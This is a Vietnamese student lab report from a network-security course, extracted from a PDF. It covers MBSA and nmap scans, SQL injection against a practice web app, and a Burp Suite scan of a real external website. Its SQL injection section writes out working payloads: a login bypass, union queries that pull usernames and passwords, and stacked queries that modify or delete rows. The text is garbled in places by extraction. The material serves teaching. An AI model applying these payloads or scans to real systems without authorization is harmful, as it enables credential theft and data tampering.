HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THƠNG TIN Học phần: An tồn mạng Báo cáo thực hành Giảng viên hướng dẫn: TS Đặng Minh Tuấn Hà Nội 2021 Mục lục I Cài đặt sử dụng công cụ rà quét lỗ hổng bảo mật cổng dịch vụ Quét hệ thống chạy HDH Windows sử dụng công cụ Microsoft Baseline Security Analyser 2 Rà quét dịch vụ lỗ hổng sử dụng công cụ nmap II Tấn công chèn mã SQL Vượt qua khâu xác thực người dùng Trích xuất liệu từ CSDL Thêm, sửa, xóa liệu 14 Khảo sát trang web mạng có lỗi chèn mã SQL (khơng sửa/xóa liệu) .15 I Cài đặt sử dụng công cụ rà quét lỗ hổng bảo mật cổng dịch vụ Quét hệ thống chạy HDH Windows sử dụng công cụ Microsoft Baseline Security Analyser Phân tích kết quét Window 7: - Local Account Pasword Test: Có vài tài khoản người dùng khơng có mật mật yếu ▪ Mức độ nguy hiểm: Cao ▪ Cách khắc phục: Đặt mật mạnh (8 kí tự trở lên, bao gồm kí tự in hoa, chữ số, kí tự đặc biệt) - Automatic Updates: Dịch vụ tự động cập nhật Windows 10 bị tắt ▪ Mức độ nguy hiểm: Cao ▪ Cách khắc phục: Bật dịch vụ đặt chế độ Automatic (Delayed Start) - Password Expiration: Có vài tài khoản người dùng có mật “không hết hạn” ▪ Mức độ nguy hiểm: Trung bình ▪ Cách khắc phục: Thay đổi mật tài khoản đó, đặt hạn cho mật - Rà quét dịch vụ lỗ hổng sử dụng công cụ nmap Thực thao tác rà quét hệ thống Lấy thông tin từ máy từ xa xác định hệ điều hành máy ▪ nmap -sS -P0 -sV -O Lấy danh sách máy chủ với cổng mở định nghĩa trước ▪ nmap -p 135 -oG – 192.168.129.1 ▪ nmap -p 445 -oG – 192.168.129.1 Tìm tất địa IP hoạt động mạng ▪ nmap -sn 192.168.129.* Ping dải địa IP ▪ nmap -sn 192.168.129.1-255 II Tấn công chèn mã SQL Vượt qua khâu xác thực người dùng - Nhập liệu cho phép đăng nhập mà khơng cần có đủ username password: o Đăng nhập tự do: nhập aaaa' or 1=1 Trích xuất liệu từ CSDL - Tìm số trường câu truy vấn trang: Số cột 3, số thứ tự bị lỗi - sam%' order by 3; - sam%' order by 4; - sam%' union select 1,2,3; 10 - Hiển thị thông tin hệ quản trị CSDL hệ điều hành: - Trích xuất danh sách bảng CSDL: - Trích xuất danh sách trường bảng: + ssss' union select '', a.name, from sys.columns a inner join sys.objects b on a.object_id = b.object_id where b.name='tbl_users'; 11 + - ssss' union select '', a.name, from sys.columns a inner join sys.objects b on a.object_id = b.object_id where b.name='students'; Trích xuất liệu bảng: + ssss' union select full_name, username+' '+password, from tbl_users; 12 + ssss' union select lastname+' '+firstname, student_code+' '+password, student_id from students ; + ssss' union select lastname+' '+firstname, student_code+' '+password, 13 student_id from students where student_code = 'B18DCAT006'; 14 Thêm, sửa, xóa liệu + samsung'; update tbl_users set password='test' where username='david'; + samsung'; insert into tbl_users (full_name, username, password) values ('hoanganh','thuchanh','abc123'); 15 + samsung'; delete from tbl_users where username = 'thuchanh'; 16 Khảo sát trang web mạng có lỗi chèn mã SQL (khơng sửa/xóa liệu) Sử dụng công cụ BurpSuite rà quét lỗ hổng bảo mật trang Web: http://www.bremed.com/ Sau thực rà quét trang Web, ta thu kết quả(như Hình): 17 Ta thấy trang Web có chứa: - lỗi mức: Trung bình lỗi mức: Thấp lỗi mức: Thông tin Chi tiết: 18 a Lỗi mức trung bình(Medium): TLS certificate Các cố sau xác định với chứng TLS máy chủ: - Chứng máy chủ không hợp lệ cho tên máy chủ Chứng máy chủ không đáng tin cậy Issue background: TLS (hoặc SSL) giúp bảo vệ tính bí mật tính tồn vẹn thơng tin truyền trình duyệt máy chủ, đồng thời cung cấp xác thực danh tính máy chủ Để phục vụ mục đích này, máy chủ phải xuất trình chứng TLS hợp lệ cho tên máy chủ máy chủ, cấp quan đáng tin cậy có giá trị cho ngày Nếu yêu cầu số không đáp ứng, kết nối TLS tới máy chủ không cung cấp bảo vệ đầy đủ mà TLS thiết kế Có nhiều cơng khác chống lại TLS nói chung bối cảnh kết nối web HTTPS nói riêng Kẻ cơng xác định có vị trí thích hợp xâm phạm kết nối TLS mà người dùng không phát chứng TLS hợp lệ sử dụng b Lỗi mức thấp(Low): Strict transport security not enforced( Bảo mật nghiêm ngặt cho vận chuyển không thực thi) 19 - Ứng dụng ngăn người dùng kết nối với qua kết nối khơng mã hóa Kẻ cơng sửa đổi lưu lượng mạng người dùng hợp pháp bỏ qua việc sử dụng mã hóa SSL / TLS ứng dụng sử dụng ứng dụng làm tảng cho công chống lại người dùng Cuộc cơng thực cách viết lại liên kết HTTPS dạng HTTP, để người dùng nhắm mục tiêu theo liên kết đến trang web từ trang HTTP, trình duyệt họ khơng cố gắng sử dụng kết nối mã hóa Cơng cụ sslstrip tự động hóa q trình - Để khai thác lỗ hổng này, kẻ công phải định vị thích hợp để đánh chặn sửa đổi lưu lượng mạng nạn nhân chia sẻ với máy tính bị xâm nhập Các biện pháp phịng thủ thơng thường mạng chuyển mạch không đủ để ngăn chặn điều Kẻ công nằm ISP người dùng sở hạ tầng lưu trữ ứng dụng thực cơng Lưu ý kẻ thù tiên tiến nhắm mục tiêu vào kết nối thực qua sở hạ tầng cốt lõi Internet Unencrypted communications(Thơng tin liên lạc khơng mã hóa) 20 - - - Ứng dụng cho phép người dùng kết nối với qua kết nối khơng mã hóa Kẻ cơng định vị thích hợp để xem lưu lượng mạng người dùng hợp pháp ghi lại giám sát tương tác họ với ứng dụng lấy thông tin mà người dùng cung cấp Hơn nữa, kẻ cơng sửa đổi lưu lượng truy cập sử dụng ứng dụng làm tảng cho công chống lại người dùng trang web bên thứ ba Các kết nối không mã hóa bị ISP phủ khai thác để theo dõi người dùng, đồng thời đưa vào quảng cáo JavaScript độc hại Do lo ngại này, nhà cung cấp trình duyệt web có kế hoạch gắn cờ trực quan kết nối không mã hóa nguy hiểm Để khai thác lỗ hổng này, kẻ cơng phải định vị thích hợp để nghe trộm lưu lượng mạng nạn nhân Trường hợp thường xảy máy khách giao tiếp với máy chủ qua kết nối khơng an tồn Wi-Fi công cộng mạng công ty mạng gia đình chia sẻ với máy tính bị xâm nhập Các biện pháp phịng thủ thơng thường mạng chuyển mạch không đủ để ngăn chặn điều Kẻ công nằm ISP người dùng sở hạ tầng lưu trữ ứng dụng thực công Lưu ý kẻ thù tiên tiến nhắm mục tiêu vào kết nối thực qua sở hạ tầng cốt lõi Internet Xin lưu ý việc sử dụng hỗn hợp thông tin liên lạc mã hóa khơng mã hóa biện pháp phịng thủ khơng hiệu chống lại kẻ cơng tích cực, chúng dễ dàng xóa tham chiếu đến tài nguyên mã hóa tham chiếu truyền qua kết nối khơng mã hóa c Lỗi mức thông tin(Info) 21 Input returned in response (reflected)( Đầu vào trả lại phản hồi) - Giá trị tên tệp đường dẫn URL chép vào phản hồi ứng dụng HTTP TRACE method is enabled(Phương thức HTTP TRACE bật) - - Phương thức HTTP TRACE thiết kế cho mục đích chẩn đốn Nếu bật, máy chủ web phản hồi yêu cầu sử dụng phương thức TRACE cách lặp lại phản hồi xác u cầu nhận Hành vi thường vô hại, dẫn đến việc tiết lộ thông tin nhạy cảm tiêu đề xác thực nội gắn proxy ngược Trước đây, chức sử dụng để bỏ qua cờ cookie HttpOnly cookie, điều khơng cịn khả thi trình duyệt web đại HTML does not specify charset (HTML không định ký tự) 22 - - Nếu phản hồi nói chứa nội dung HTML khơng định ký tự, trình duyệt phân tích HTML cố gắng xác định ký tự mà sử dụng Ngay phần lớn HTML thực sử dụng ký tự tiêu chuẩn UTF-8, diện ký tự không chuẩn đâu phản hồi khiến trình duyệt diễn giải nội dung cách sử dụng ký tự khác Điều có kết khơng mong muốn dẫn đến lỗ hổng tập lệnh nhiều trang web mã hóa khơng chuẩn UTF-7 sử dụng để vượt qua lọc phòng thủ ứng dụng Trong hầu hết trường hợp, việc khơng có thị ký tự không tạo thành lỗ hổng bảo mật, đặc biệt phản hồi chứa nội dung tĩnh Bạn nên xem lại nội dung phản hồi bị ảnh hưởng bối cảnh mà chúng xuất hiện, để xác định xem có lỗ hổng bảo mật tồn hay không Frameable response (potential Clickjacking) - Nếu trang không đặt tiêu đề HTTP X-Frame-Options ContentSecurity-Policy thích hợp, trang kẻ cơng kiểm sốt tải iframe Điều kích hoạt cơng clickjacking, trang 23 - - kẻ công phủ lên giao diện ứng dụng mục tiêu với giao diện khác kẻ công cung cấp Bằng cách khiến người dùng nạn nhân thực hành động nhấp chuột nhấn phím, kẻ cơng khiến họ vơ tình thực hành động ứng dụng nhắm mục tiêu Kỹ thuật cho phép kẻ công phá vỡ biện pháp phòng thủ chống lại việc giả mạo yêu cầu nhiều trang web dẫn đến hành động trái phép Lưu ý số ứng dụng cố gắng ngăn chặn công từ bên trang HTML, cách sử dụng mã "đánh khung" Tuy nhiên, kiểu phòng thủ thường khơng hiệu thường bị phá vỡ kẻ công lành nghề Bạn nên xác định xem người dùng ứng dụng sử dụng chức truy cập trang đóng khung để thực hành động nhạy cảm ứng dụng hay không 24 ... I Cài đặt sử dụng công cụ rà quét lỗ hổng bảo mật cổng dịch vụ Quét hệ thống chạy HDH Windows sử dụng công cụ Microsoft Baseline Security Analyser 2 Rà quét dịch vụ lỗ hổng sử dụng. .. có lỗi chèn mã SQL (khơng sửa/xóa liệu) .15 I Cài đặt sử dụng công cụ rà quét lỗ hổng bảo mật cổng dịch vụ Quét hệ thống chạy HDH Windows sử dụng cơng cụ Microsoft Baseline Security... hạn” ▪ Mức độ nguy hiểm: Trung bình ▪ Cách khắc phục: Thay đổi mật tài khoản đó, đặt hạn cho mật - Rà quét dịch vụ lỗ hổng sử dụng công cụ nmap Thực thao tác rà quét hệ thống Lấy thông tin từ máy